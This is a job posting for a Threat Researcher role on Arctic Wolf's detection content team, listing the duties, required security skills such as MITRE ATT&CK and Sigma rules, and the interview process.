Threat Researcher

Threat Researcher

About the Team:
Arctic Wolf Threat Content Team is the owner and intellectual author of the telemetry and detection rules of our Aurora Focus (EDR) product part of Aurora Endpoint Defense.Our Team started only 3 years ago in BlackBerry-Cylance. Since then we have developed many internal tools to streamline our daily tasks defined work standards and how to create content (detection/telemetry rules) and high fidelity content (fine tune processes reduce f) created quality assurance processes (Unit Test Regression and E2E Testing) communication channels with other areas of Threat Intel and S2 without neglecting our main mission which is end cyber risk. We work together with MDR TRI AR and CTI teams to be ahead with latest findings. As well as always on the lookout for new attacks 0days TTP updates keeping our client protected.

We actively participate in the purple teaming exercise perform by AR Team that emulates the most relevant Threat Actors. In our trajectory we have 2 Mitre accreditations Enterprise 2023 - Turla and Managed Services 2024 - MenuPass both we participated as EDR Blue Teamers.

About the Role and Responsibilities:

• Analyse research and develop new content for Aurora Focus applying MITRE ATT&CK framework.
• Convert investigations performed by our Threat Teams: TRIARCTI into new content (detection/telemetry rules).
• Customer Escalation (BFD) collaborate with S2 teams on investigations regarding emerging threats to generate new
• detection rules.
• Fine tuning: determining true threats or false positives and providing solutions like exclusions logic change or decreasing
• severity.
• Python scripting to automate new internal tools or projects.
• Ability to effectively manage multiple tasks simultaneously; coordinating and ensuring scheduled goals are met.
• Maintain documentation up to date: about a new tool or process we add.
• Run regression and end-2-end testing
• Push production releases and notification emails.
• Participate in Purple Teaming exercises
• Generate metrics over Databricks Dashboard.
• Deliver regular threat briefing presentations to internal & external stakeholders on topics ranging from threat actor campaign activity novel TTPs and emerging malware or exploits
• Utilize best practices for threat research and documentation and deliver high-quality detection rules.

About You:

• Relevant experience in a professional setting for threat intelligence or threat research roles
• Experience with applying the MITRE ATT&CK framework to intelligence products and associated depth of analysis for each TTP and threat actor represented in this body of knowledge
• Experience analysing application and infrastructure telemetry (application logs network flow logs audit logs metrics core dumps etc.)
• Experience analysing and deriving intelligence from phishing and malware campaigns vulnerabilities being exploited in the wild supply chain attacks and Data breaches
• Understanding of threat protection/detection tooling/stacks: SIEM XDR/EDR
• Experience working with Python scripts.
• Understand Json format and regex usage.
• Linux and MacOS Terminal usage
• Basic .sh/.bat scripting knowledge
• Windows sysinternals
• Experience using Git repositories (GitHub Git Bash GitLab)
• Experience using Virtual Machines (VMware workstation)
• SQL Knowledge Databricks is a plus.
• Lolbins/Lolbas Knowledge
• Sigma Rules Knowledge
• Excellent written and verbal communication skills
• Resourceful self-starter with a positive can-do attitude
  

Nice to Have:

• Experience with Agile Methodology
• Experience using Elastic search Kibana or Grafana.
• You have delivered presentations on cybersecurity or cyber threat intelligence at industry conferences or meetups
• You have participated in sharing of threat intelligence through ISACs Trust Groups intelligence partnerships or via other open communities
• CISSP OSCP GCTI or other relevant certifications are a plus

Interview Process:
The interview process is approximately as follows:

• Phone pre-screening: A recruiter contacts you to briefly discuss your work history and provide an overview of Arctic Wolf. Approximately 30 minutes
• Technical assessment: A recruiter sends you a threat intelligence assessment to complete that will allow you to demonstrate your strategic thinking analytical skills and your technical understanding of various threat actor TTPs malware vulnerabilities and/or exploits
• Face-to-face interviews: Several team members conduct interviews to learn more about you and provide more information about your potential role and team. Be prepared to discuss your technical assessment collaborate on a technical problem and talk more about past projects and your career goals. Approximately 1 hour per interview

On-Camera Policy
To support a fair transparent and engaging interview experience candidates interviewing remotely are expected to be on camera during all video interviews.
Being on camera fosters authentic connection improves communication and allows for full engagement from both candidates and interviewers.
We understand that technical bandwidth or location-related challenges may occasionally prevent video use.

We understand that in some cases candidates may face technical bandwidth or location-related challenges that limit their ability to use video. If this applies to you please let us know in advance so we can consider appropriate accommodations or find an alternative solution.